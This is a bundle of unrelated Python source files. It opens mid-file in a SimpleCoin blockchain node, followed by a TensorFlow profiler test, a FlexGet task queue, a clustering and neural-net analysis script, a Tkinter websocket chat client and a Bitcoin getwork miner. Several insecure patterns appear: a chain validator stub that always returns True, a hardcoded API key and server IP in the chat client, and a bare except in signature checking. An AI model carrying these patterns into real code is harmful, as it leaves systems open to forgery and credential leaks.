# Keep searching for proof
return False
else:
# Give up searching proof, update chain and start over again
BLOCKCHAIN = longest_chain
return BLOCKCHAIN
def validate_blockchain(block):
"""Validate the submitted chain. If hashes are not correct, return false
block(str): json
"""
return True
@node.route('/blocks', methods=['GET'])
def get_blocks():
# Load current blockchain. Only you should update your blockchain
if request.args.get("update") == MINER_ADDRESS:
global BLOCKCHAIN
BLOCKCHAIN = b.recv()
chain_to_send = BLOCKCHAIN
# Converts our blocks into dictionaries so we can send them as json objects later
chain_to_send_json = []
for block in chain_to_send:
block = {
"index": block.index,
"timestamp": block.timestamp,
"data": block.data,
"hash": block.hash
}
chain_to_send_json.append(block)
# Send our chain to whomever requested it
chain_to_send = json.dumps(chain_to_send_json, sort_keys=True)
return chain_to_send
@node.route('/txion', methods=['GET', 'POST'])
def transaction():
"""Each transaction sent to this node gets validated and submitted.
Then it waits to be added to the blockchain. Transactions only move
    coins, they don't create them.
"""
if request.method == 'POST':
# On each new POST request, we extract the transaction data
new_txion = request.get_json()
# Then we add the transaction to our list
if validate_signature(new_txion['from'], new_txion['signature'], new_txion['message']):
NODE_PENDING_TRANSACTIONS.append(new_txion)
# Because the transaction was successfully
# submitted, we log it to our console
print("New transaction")
print("FROM: {0}".format(new_txion['from']))
print("TO: {0}".format(new_txion['to']))
print("AMOUNT: {0}\n".format(new_txion['amount']))
# Then we let the client know it worked out
return "Transaction submission successful\n"
else:
return "Transaction submission failed. Wrong signature\n"
# Send pending transactions to the mining process
elif request.method == 'GET' and request.args.get("update") == MINER_ADDRESS:
pending = json.dumps(NODE_PENDING_TRANSACTIONS, sort_keys=True)
# Empty transaction list
NODE_PENDING_TRANSACTIONS[:] = []
return pending
def validate_signature(public_key, signature, message):
"""Verifies if the signature is correct. This is used to prove
it's you (and not someone else) trying to do a transaction with your
address. Called when a user tries to submit a new transaction.
"""
public_key = (base64.b64decode(public_key)).hex()
signature = base64.b64decode(signature)
vk = ecdsa.VerifyingKey.from_string(bytes.fromhex(public_key), curve=ecdsa.SECP256k1)
# Try changing into an if/else statement as except is too broad.
try:
return vk.verify(signature, message.encode())
except:
return False
def welcome_msg():
print(""" =========================================\n
SIMPLE COIN v1.0.0 - BLOCKCHAIN SYSTEM\n
=========================================\n\n
You can find more help at: https://github.com/cosme12/SimpleCoin\n
    Make sure you are using the latest version or you may end up in
a parallel chain.\n\n\n""")
if __name__ == '__main__':
if MINER_ADDRESS == "":
print('You need to configure your miner_config.py file with your wallet address. You can generate a wallet address using the wallet.py file.')
else:
welcome_msg()
# Start mining
a, b = Pipe()
p1 = Process(target=mine, args=(a, BLOCKCHAIN, NODE_PENDING_TRANSACTIONS))
p1.start()
# Start server to receive transactions
        # Pass the method itself (not the result of calling it) so the Flask
        # server actually runs inside the child process
        p2 = Process(target=node.run, args=())
p2.start()
|
profiler_api_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf 2.x profiler."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import os
import threading
import portpicker
from tensorflow.python.distribute import collective_all_reduce_strategy as collective_strategy
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.eager import context
from tensorflow.python.framework import test_util
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.profiler import profiler_client
from tensorflow.python.profiler import profiler_v2 as profiler
from tensorflow.python.profiler.integration_test import mnist_testing_utils
def _model_setup():
"""Set up a MNIST Keras model for testing purposes.
Builds a MNIST Keras model and returns model information.
Returns:
A tuple of (batch_size, steps, train_dataset, mode)
"""
context.set_log_device_placement(True)
batch_size = 64
steps = 2
with collective_strategy.CollectiveAllReduceStrategy().scope():
# TODO(b/142509827): In rare cases this errors out at C++ level with the
# "Connect failed" error message.
train_ds, _ = mnist_testing_utils.mnist_synthetic_dataset(batch_size, steps)
model = mnist_testing_utils.get_mnist_model((28, 28, 1))
return batch_size, steps, train_ds, model
def _make_temp_log_dir(test_obj):
return test_obj.get_temp_dir()
class ProfilerApiTest(test_util.TensorFlowTestCase):
def _check_tools_pb_exist(self, logdir):
expected_files = [
'overview_page.pb',
'input_pipeline.pb',
'tensorflow_stats.pb',
'kernel_stats.pb',
]
for file in expected_files:
path = os.path.join(logdir, 'plugins', 'profile', '*', '*{}'.format(file))
self.assertEqual(1, len(glob.glob(path)),
'Expected one path match: ' + path)
def _check_xspace_pb_exist(self, logdir):
path = os.path.join(logdir, 'plugins', 'profile', '*', '*.xplane.pb')
self.assertEqual(1, len(glob.glob(path)),
'Expected one path match: ' + path)
def test_single_worker_no_profiling(self):
"""Test single worker without profiling."""
_, steps, train_ds, model = _model_setup()
model.fit(x=train_ds, epochs=2, steps_per_epoch=steps)
def test_single_worker_sampling_mode(self):
"""Test single worker sampling mode."""
def on_worker(port):
logging.info('worker starting server on {}'.format(port))
profiler.start_server(port)
_, steps, train_ds, model = _model_setup()
model.fit(x=train_ds, epochs=2, steps_per_epoch=steps)
def on_profile(port, logdir):
# Request for 30 milliseconds of profile.
duration_ms = 30
options = profiler.ProfilerOptions(
host_tracer_level=2,
python_tracer_level=0,
device_tracer_level=1,
)
profiler_client.trace('localhost:{}'.format(port), logdir, duration_ms,
'', 100, options)
logdir = self.get_temp_dir()
port = portpicker.pick_unused_port()
thread_profiler = threading.Thread(target=on_profile, args=(port, logdir))
thread_worker = threading.Thread(target=on_worker, args=(port,))
thread_worker.start()
thread_profiler.start()
thread_profiler.join()
thread_worker.join(120)
self._check_xspace_pb_exist(logdir)
def test_single_worker_programmatic_mode(self):
"""Test single worker programmatic mode."""
logdir = self.get_temp_dir()
options = profiler.ProfilerOptions(
host_tracer_level=2,
python_tracer_level=0,
device_tracer_level=1,
)
profiler.start(logdir, options)
_, steps, train_ds, model = _model_setup()
model.fit(x=train_ds, epochs=2, steps_per_epoch=steps)
profiler.stop()
self._check_xspace_pb_exist(logdir)
self._check_tools_pb_exist(logdir)
if __name__ == '__main__':
multi_process_runner.test_main()
|
task_queue.py
|
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
import logging
import queue
import sys
import threading
import time
from sqlalchemy.exc import ProgrammingError, OperationalError
from flexget.task import TaskAbort
log = logging.getLogger('task_queue')
class TaskQueue(object):
"""
Task processing thread.
Only executes one task at a time, if more are requested they are queued up and run in turn.
"""
def __init__(self):
self.run_queue = queue.PriorityQueue()
self._shutdown_now = False
self._shutdown_when_finished = False
self.current_task = None
# We don't override `threading.Thread` because debugging this seems unsafe with pydevd.
# Overriding __len__(self) seems to cause a debugger deadlock.
self._thread = threading.Thread(target=self.run, name='task_queue')
self._thread.daemon = True
def start(self):
self._thread.start()
def run(self):
while not self._shutdown_now:
# Grab the first job from the run queue and do it
try:
self.current_task = self.run_queue.get(timeout=0.5)
except queue.Empty:
if self._shutdown_when_finished:
self._shutdown_now = True
continue
try:
self.current_task.execute()
except TaskAbort as e:
log.debug('task %s aborted: %r' % (self.current_task.name, e))
except (ProgrammingError, OperationalError):
log.critical('Database error while running a task. Attempting to recover.')
self.current_task.manager.crash_report()
except Exception:
log.critical('BUG: Unhandled exception during task queue run loop.')
self.current_task.manager.crash_report()
finally:
self.run_queue.task_done()
self.current_task = None
remaining_jobs = self.run_queue.qsize()
if remaining_jobs:
log.warning('task queue shut down with %s tasks remaining in the queue to run.' % remaining_jobs)
else:
log.debug('task queue shut down')
def is_alive(self):
return self._thread.is_alive()
def put(self, task):
"""Adds a task to be executed to the queue."""
self.run_queue.put(task)
def __len__(self):
return self.run_queue.qsize()
def shutdown(self, finish_queue=True):
"""
Request shutdown.
:param bool finish_queue: Should all tasks be finished before ending thread.
"""
log.debug('task queue shutdown requested')
if finish_queue:
self._shutdown_when_finished = True
if self.run_queue.qsize():
log.verbose('There are %s tasks to execute. Shutdown will commence when they have completed.' %
self.run_queue.qsize())
else:
self._shutdown_now = True
def wait(self):
"""
Waits for the thread to exit.
Allows abortion of task queue with ctrl-c
"""
if sys.version_info >= (3, 4):
            # Due to a Python bug, Thread.is_alive doesn't seem to work properly under our conditions on Python 3.4+
# http://bugs.python.org/issue26793
# TODO: Is it important to have the clean abortion? Do we need to find a better way?
self._thread.join()
return
try:
while self._thread.is_alive():
time.sleep(0.5)
except KeyboardInterrupt:
log.error('Got ctrl-c, shutting down after running task (if any) completes')
self.shutdown(finish_queue=False)
# We still wait to finish cleanly, pressing ctrl-c again will abort
while self._thread.is_alive():
time.sleep(0.5)
|
bc-analysis.py
|
# source: https://github.com/joshuamorton/Machine-Learning/blob/master/P3/analysis.py
# source: https://github.com/iRapha/CS4641/blob/master/P3/analysis.py
import argparse
# import multiprocessing as mp
from pprint import pprint
from StringIO import StringIO
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans as KM
from sklearn.decomposition import FastICA as ICA
from sklearn.decomposition.pca import PCA as PCA
from sklearn.feature_selection import SelectKBest as best
from sklearn.feature_selection import chi2
from sklearn.mixture import GMM as EM
from sklearn.random_projection import GaussianRandomProjection as RandomProjection
from sknn.mlp import Classifier, Layer
import data_util as util
def plot(axes, values, x_label, y_label, title, name):
print "plot" + title + name
plt.clf()
plt.plot(*values)
plt.axis(axes)
plt.title(title)
plt.ylabel(y_label)
plt.xlabel(x_label)
plt.savefig("plots/bc/"+name+".png", dpi=500)
# plt.show()
plt.clf()
def pca(tx, ty, rx, ry):
print "pca"
compressor = PCA(n_components = tx[1].size/2)
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add="wPCAtr")
km(newtx, ty, newrx, ry, add="wPCAtr")
nn(newtx, ty, newrx, ry, add="wPCAtr")
print "pca done"
def ica(tx, ty, rx, ry):
print "ica"
compressor = ICA(whiten=True) # for some people, whiten needs to be off
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add="wICAtr")
km(newtx, ty, newrx, ry, add="wICAtr")
nn(newtx, ty, newrx, ry, add="wICAtr")
print "ica done"
def randproj(tx, ty, rx, ry):
print "randproj"
compressor = RandomProjection(tx[1].size)
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
# compressor = RandomProjection(tx[1].size)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add="wRPtr")
km(newtx, ty, newrx, ry, add="wRPtr")
nn(newtx, ty, newrx, ry, add="wRPtr")
print "randproj done"
def kbest(tx, ty, rx, ry):
print "kbest"
for i in range(7):
k = i + 1
add = "wKBtr" + str(k)
compressor = best(chi2, k=k)
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add=add)
km(newtx, ty, newrx, ry, add=add)
nn(newtx, ty, newrx, ry, add=add)
print "kbest done"
def em(tx, ty, rx, ry, add="", times=10):
print "em" + add
errs = []
# this is what we will compare to
checker = EM(n_components=2)
checker.fit(ry)
truth = checker.predict(ry)
# so we do this a bunch of times
for i in range(2,times):
clusters = {x:[] for x in range(i)}
# create a clusterer
clf = EM(n_components=i)
clf.fit(tx) #fit it to our data
test = clf.predict(tx)
result = clf.predict(rx) # and test it on the testing set
# here we make the arguably awful assumption that for a given cluster,
# all values in tha cluster "should" in a perfect world, belong in one
# class or the other, meaning that say, cluster "3" should really be
# all 0s in our truth, or all 1s there
#
# So clusters is a dict of lists, where each list contains all items
# in a single cluster
for index, val in enumerate(result):
clusters[val].append(index)
# then we take each cluster, find the sum of that clusters counterparts
# in our "truth" and round that to find out if that cluster should be
# a 1 or a 0
mapper = {x: round(sum(truth[v] for v in clusters[x])/float(len(clusters[x]))) if clusters[x] else 0 for x in range(i)}
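# worked example: if cluster 3 contains points whose truth labels are
# [1, 1, 0, 1], the mean is 0.75, which rounds to 1, so every point
# assigned to cluster 3 is mapped to class 1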
# the processed list holds the results of this, so if cluster 3 was
# found to be of value 1,
# for each value in clusters[3], processed[value] == 1 would hold
processed = [mapper[val] for val in result]
errs.append(sum((processed-truth)**2) / float(len(ry)))
plot([0, times, min(errs)-.1, max(errs)+.1],[range(2, times), errs, "ro"], "Number of Clusters", "Error Rate", "Expectation Maximization Error", "EM"+add)
# dank magic, wrap an array cuz reasons
td = np.reshape(test, (test.size, 1))
rd = np.reshape(result, (result.size, 1))
newtx = np.append(tx, td, 1)
newrx = np.append(rx, rd, 1)
nn(newtx, ty, newrx, ry, add="onEM"+add)
print "em done" + add
def km(tx, ty, rx, ry, add="", times=10):
print "km"
#this does the exact same thing as the above
clusters = [8, 11] # eight for num speakers, eleven for num vowels
for num_c in clusters:
add += "nc" + str(num_c)
errs = []
checker = KM(n_clusters=num_c)
checker.fit(ry)
truth = checker.predict(ry)
# so we do this a bunch of times
for i in range(2,times):
clusters = {x:[] for x in range(i)}
clf = KM(n_clusters=i)
clf.fit(tx) #fit it to our data
test = clf.predict(tx)
result = clf.predict(rx) # and test it on the testing set
for index, val in enumerate(result):
clusters[val].append(index)
mapper = {x: round(sum(truth[v] for v in clusters[x])/float(len(clusters[x]))) if clusters[x] else 0 for x in range(i)}
processed = [mapper[val] for val in result]
errs.append(sum((processed-truth)**2) / float(len(ry)))
plot([0, times, min(errs)-.1, max(errs)+.1],[range(2, times), errs, "ro"], "Number of Clusters", "Error Rate", "KMeans clustering error", "KM"+add)
td = np.reshape(test, (test.size, 1))
rd = np.reshape(result, (result.size, 1))
newtx = np.append(tx, td, 1)
newrx = np.append(rx, rd, 1)
nn(newtx, ty, newrx, ry, add="onKM"+add)
print "km done" + add
def nn(tx, ty, rx, ry, add="", iterations=4001):
"""
trains and plots a neural network on the data we have
"""
print "nn" + add
resultst = []
resultsr = []
iter_arr = np.arange(iterations, step=500)
iter_arr[0] = 1
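# with the default iterations=4001 this evaluates epochs [1, 500, 1000, ..., 4000]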
# queue = mp.Queue()
# processes = []
# processes = [mp.Process(target=_nn, args=[tx, ty, rx, ry, i_num]) for i_num in iter_arr]
# for p in processes:
# p.start()
# for p in processes:
# p.join()
# results = []
# for _ in processes:
# results.append(queue.get());
# for result in sorted(results, key=lambda x: x[0]):
# print result
# i_num, train_score, test_score = result
# resultst.append(train_score)
# resultsr.append(test_score)
for i_num in iter_arr:
result = _nn(tx, ty, rx, ry, i_num)
print result
resultst.append(1. - result[1])
resultsr.append(1. - result[2])
plot([0, iterations, 0, 1], (iter_arr, resultst, "ro", iter_arr, resultsr, "bo"), "Network Epoch", "Percent Error", "Neural Network Error", "NN"+add)
print "nn done" + add
def _nn(tx, ty, rx, ry, n_iter):
print "_nn"
nn = Classifier(
layers=[
Layer("Sigmoid", units=100),
Layer("Softmax")],
n_iter=n_iter)
nn.fit(tx, ty)
resultst = nn.score(tx, ty)
resultsr = nn.score(rx, ry)
print "_nn done"
return n_iter, resultst, resultsr
if __name__=="__main__":
train_x, train_y, test_x, test_y = util.load_breast_cancer()
kbest(train_x, train_y, test_x, test_y)
em(train_x, train_y, test_x, test_y)
km(train_x, train_y, test_x, test_y)
randproj(train_x, train_y, test_x, test_y)
pca(train_x, train_y, test_x, test_y)
ica(train_x, train_y, test_x, test_y)
nn(train_x, train_y, test_x, test_y)
|
__init__.py
|
#!/usr/bin/python3
import os
import sys
import json
import websocket
import time
import datetime
from tkinter import *
from PIL import ImageTk, Image
from threading import Thread
from textwrap3 import wrap
from ..database.datalocal import *
from ..database.database import *
class ChatSocket_C:
def __init__(self, master, id_from, id_to):
self.employee_id_from = id_from
self.employee_id_to = id_to
self.master = master
self.API_KEY = "hfjkasdhfkjashdfaçsljf"
self.ws = websocket.WebSocketApp("ws://34.95.239.34:5000/", on_open=self.ws_open, on_message=self.ws_message)
self.receive_thread = Thread(target=self.ws_thread)
self.receive_thread.setDaemon(True)
self.receive_thread.start()
time.sleep(5)
self.msg_json = json.dumps(({"type": "init", "message": {"employee_id_from": self.employee_id_from, "employee_id_to" : self.employee_id_to}}))
self.ws.send(self.msg_json)
def ws_thread(self):
self.ws.run_forever()
def ws_open(self):
msg_json = json.dumps({"type": "login", "auth": {"employee_id_from": self.employee_id_from, "params": self.API_KEY}})
print(msg_json)
self.ws.send(msg_json)
def ws_send(self, message):
self.ws_open()
msg_json = json.dumps(({"type": "message", "message": {"employee_id_from": self.employee_id_from, "employee_id_to" : self.employee_id_to, "type" : "C", "description": message}}))
print(msg_json)
self.ws.send(msg_json)
def ws_message(self, message):
msg_json = json.loads(message)
print(msg_json)
self.master.receive(msg_json["message"]["is_send_from"], msg_json["message"]["description"], msg_json["message"]["start_date"])
def ws_init(self):
msg_json = json.dumps(({"type": "init", "message": {"employee_id_from": self.employee_id_from, "employee_id_to" : self.employee_id_to}}))
print(msg_json)
self.ws.send(msg_json)
class ScrollFrame(Frame):
def __init__(self, parent):
super().__init__(parent)
self.canvas = Canvas(self, borderwidth=0, background="#ffffff", width=695, height=380)
self.viewPort = Frame(self.canvas, width=695, height=380,background="#ffffff")
self.vsb = Scrollbar(self, orient="vertical", width=16, command=self.canvas.yview)
self.vsb.grid(row=0, column=1, sticky='ns')
self.canvas.configure(yscrollcommand=self.vsb.set)
self.vsb.pack(side="right", fill="y")
self.canvas.pack(side="left", fill="both", expand=True)
self.canvas_window = self.canvas.create_window((4,4), window=self.viewPort, anchor="nw", tags="self.viewPort")
self.viewPort.bind("<Configure>", self.onFrameConfigure)
self.canvas.bind("<Configure>", self.onCanvasConfigure)
self.onFrameConfigure(None)
def onFrameConfigure(self, event=None):
self.canvas.configure(yscrollcommand=self.vsb.set, scrollregion=self.canvas.bbox('all'))
def onCanvasConfigure(self, event):
canvas_width = event.width
self.canvas.itemconfig(self.canvas_window, width = canvas_width)
class ChatFrame:
def send(self, event=None):
msg = self.entry_field.get("1.0", END)
if(msg != ""):
self.ws_send(msg)
self.entry_field.delete(1.0, END)
def receive(self, isfrom, message, date):
hour = datetime.datetime.strptime(date, '%Y-%m-%d %H:%M:%S.%f')
message = message
novaMensagem = ""
for txtLine in wrap(message, 80):
novaMensagem += txtLine+"\n"
novaMensagem += "\n"+hour.strftime("%H:%M - %d/%m/%Y")
if isfrom == 1:
self.msg_list_escreve = Label(self.primeiroContainer2.viewPort, text=novaMensagem, width=80, bg="gray96", anchor='ne', justify='right', font=self.fontPadrao).pack(padx=0, pady=3)
else:
self.msg_list_escreve = Label(self.primeiroContainer2.viewPort, text=novaMensagem, width=80, bg="gray91", anchor='nw', justify='left', font=self.fontPadrao).pack(padx=0, pady=3)
self.primeiroContainer2.canvas.yview_moveto(3)
self.primeiroContainer2.onFrameConfigure()
def rand_func(self, a, b):
self.webS = ChatSocket_C(self.master, self.InfoUser["employee"]["id"], b)
self.ws_send = self.webS.ws_send
self.send_button["state"] = "normal"
def __init__(self, master):
self.InfoUserDBLocal = DataLocal()
self.InfoUser = self.InfoUserDBLocal.dados()
self.DataBaseInfo = DataBase()
self.infoUserHierarchGroup = self.DataBaseInfo.init_workday_chat(self.InfoUser["employee"]["cpf"])
self.base_dir = "C:\\ConectaIT\\modules\\chat"
self.dir_path = "C:\\ConectaIT\\modules\\chat"
self.master = master
self.fontPadrao = ("Arial", 11)
self.fontMessage = ("Arial", 10)
self.Conteiner = Frame(self.master)
self.Conteiner["height"] = 480
self.Conteiner["width"] = 300
self.Conteiner["bg"] = "#FFFFFF"
self.Conteiner.pack(side=LEFT, anchor="nw")
self.Conteiner0 = Frame(self.master)
self.Conteiner0["height"] = 480
self.Conteiner0["width"] = 5
self.Conteiner0["bg"] = "#F2F2F2"
self.Conteiner0.pack(side=LEFT)
self.Conteiner1 = Frame(self.master)
self.Conteiner1["height"] = 480
self.Conteiner1["width"] = 695
self.Conteiner1["bg"] = "#FFFFFF"
self.Conteiner1.pack(side=LEFT)
self.tipodeChat = Frame(self.Conteiner1)
self.tipodeChat["width"] = 695
self.tipodeChat["height"] = 2
self.tipodeChat["bg"] = "snow"
self.tipodeChat.pack()
self.UsersON = Frame(self.Conteiner)
self.UsersON["pady"] = 0
self.UsersON["width"] = 300
self.UsersON["height"] = 20
self.UsersON["bg"] = "#FAFAFA"
self.UsersON.pack()
self.Ants = 0
self.ConteinerInfoBoxUserSelect = {}
self.UrlLinkImg = {}
self.ConteinerInfoBoxUserSelectImagem = {}
self.ConteinerInfoBoxUserSelect2 = {}
self.textConteinerUser = {}
#self.ConteinerUserTB = ScrollFrame2(self.Conteiner)
#self.ConteinerUserTB["pady"] = 0
#self.ConteinerUserTB["bg"] = "#FAFAFA"
#self.ConteinerUserTB.pack()
for jso in self.infoUserHierarchGroup["hierarch_group"]:
self.ConteinerInfoBoxUserSelect[self.Ants] = Canvas(self.Conteiner, width=300, height=50, borderwidth=0, bg="#FFFFFF")
self.ConteinerInfoBoxUserSelect[self.Ants].bind("<Button-1>", lambda event, a=jso["name"], b=jso["id"]: self.rand_func(a, b))
self.ConteinerInfoBoxUserSelect[self.Ants].bind("<Key>", lambda event, a=jso["name"], b=jso["id"]: self.rand_func(a, b))
self.ConteinerInfoBoxUserSelect[self.Ants].pack()
self.UrlLinkImg[self.Ants] = ImageTk.PhotoImage(Image.open(self.dir_path + "\\..\\logs\\img\\"+self.InfoUserDBLocal.imagem_user_download_outros(jso["imagem"]["file_path"], jso["imagem"]["file_name"])).resize((40, 40), Image.ANTIALIAS), master=self.master)
self.ConteinerInfoBoxUserSelectImagem[self.Ants] = self.ConteinerInfoBoxUserSelect[self.Ants].create_image(27, 27, image=self.UrlLinkImg[self.Ants])
for txtLine in wrap(jso["name"], 20):
self.textConteinerUser[self.Ants] = txtLine
break
self.ConteinerInfoBoxUserSelect[self.Ants].create_text(70, 12, font=("Arial", 11), anchor="nw", text=self.textConteinerUser[self.Ants])
self.Ants = self.Ants + 1
self.chatLabel = Label(self.tipodeChat, text="Mensagens: " , bg="gray90", width=695,
height=2, anchor="nw", font=self.fontPadrao).pack()
self.primeiroContainer2 = ScrollFrame(self.Conteiner1)
self.primeiroContainer2["pady"] = 0
self.primeiroContainer2["width"] = 695
self.primeiroContainer2["height"] = 400
self.primeiroContainer2["bg"] = "snow"
self.primeiroContainer2.pack()
self.containerEscrever = Frame(self.Conteiner1)
self.containerEscrever["pady"] = 0
self.containerEscrever["width"] = 695
self.containerEscrever["height"] = 30
self.containerEscrever.pack()
self.entry_field = Text(self.containerEscrever, font=('Arial', 12), width=70, height=8)
self.entry_field.pack(side=LEFT, fill=Y)
self.icone_send = ImageTk.PhotoImage(Image.open(self.dir_path + "\\..\\..\\modules\\chat\\Send.png").resize((40, 40), Image.ANTIALIAS), master=master)
self.send_button = Button(self.containerEscrever, text="Enviar", command=self.send)
self.send_button['image'] = self.icone_send
self.send_button["width"] = 60
self.send_button["height"] = 60
self.send_button["bg"] = "#FFFFFF"
self.send_button["borderwidth"] = 0
self.send_button["state"] = "disabled"
self.send_button.pack(side=RIGHT, fill=BOTH)
class TkInit_chat:
def __init__(self, id_from, id_to):
self.chat = Tk()
self.chat.title("Conecta - Chat")
self.chat["borderwidth"] = 0
self.chat["bg"] = "white"
self.w = 1000
self.h = 480
self.ws = self.chat.winfo_screenwidth()
self.hs = self.chat.winfo_screenheight()
self.x = (self.ws/2) - (self.w/2)
self.y = (self.hs/2) - (self.h/2)
self.chat.geometry('%dx%d+%d+%d' % (self.w, self.h, self.x, self.y))
self.chat.iconbitmap('media/img/icone.ico')
self.chat.resizable(0, 0)
self.chat.wm_attributes("-topmost", True)
self.inf = ChatFrame(self.chat)
self.chat.mainloop()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
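# (header layout: version 4B + prev-block hash 32B + merkle root 32B +
#  timestamp 4B + bits 4B + nonce 4B = 80B; only the trailing 4-byte nonce
#  changes per attempt, so the first 76 bytes can be pre-hashed once)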
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 2501
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
OSC3.py
|
#!/usr/bin/python
"""
